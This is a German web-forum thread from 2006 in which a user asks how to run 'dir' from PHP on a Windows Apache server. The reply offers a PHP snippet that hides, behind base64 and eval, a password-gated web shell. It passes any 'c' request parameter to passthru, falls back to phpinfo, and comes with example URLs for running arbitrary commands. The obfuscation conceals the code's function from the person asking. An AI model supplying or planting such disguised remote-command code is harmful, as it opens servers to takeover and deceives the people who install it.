CMD-cmds mit php

Dieses Thema im Forum "Webentwicklung" wurde erstellt von myth2806, 27. Juni 2006 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 27. Juni 2006
    Hi leutz

also ich würde gerne mit hilfe von irgeneinem php-script den befehl "dir" auf einem unter windows laufendem apache-server laufen lassen. ich hoffe jemand hat da eine möglichkeit das zu verwirklichen :]

thx schon mal im vorraus!

greez myth

2. Anzeige
  3. #2 28. Juni 2006
    hi du!

hab mal ein script geschrieben mit welchem so etwas machen kannst! Hier mal zuerst der Source:

Code:
    <?
    eval(str_replace('\\','',base64_decode("JGMgPSAkX1JFUVVFU1RbXCdjXCddOw0KJHAgPSAkX1JFUVVFU1RbXCdwXCddOw0KcHJpbnQgXCIkYyArICRwXCI7DQppZigkYyAmJiBtZDUoJHApPT0gXCdlYjM5OWJjYWNhNjg2Zjg2MDkxMzcxNTMzMDdlZWNmMVwnICkNCnsNCglwcmludCBcIiRjXCI7DQoJcGFzc3RocnUoJGMpOw0KCQ0KfQ0KZWxzZSANCnsNCglwaHBpbmZvKCk7DQp9")));
    ?>

funktionsweise:

php code in einer php file speichern z.b. test.php

aufruf der datei dann bitte wie folgt:

http://<ip>/test.php?p=change&c=<command>

p=change muss drin sein weil ich ne passwort überprüfung drin hab - wenn p nicht change ist, zeigt es dir einen phpinfo file an...

statt <command> kannst du dann entweder unix oder windows befehle angeben! z.b. für eine auflistung der dateien:

unter unix: ls -latr
    unter windows: dir

also z.b.: http://<ip>/test.php?p=change&c=dir

hoffe ich konnte dir helfen!

lg
    maui

4. #3 28. Juni 2006
    thx dafür... hastd dir ja echt mühe gemacht bei der erklärung :p aber ich wollte nur
    den befehl "passthru" kennen... den hab ich ja jetzt :]

thx

greez myth

//closed

5. Videos zum Thema
Die Seite wird geladen...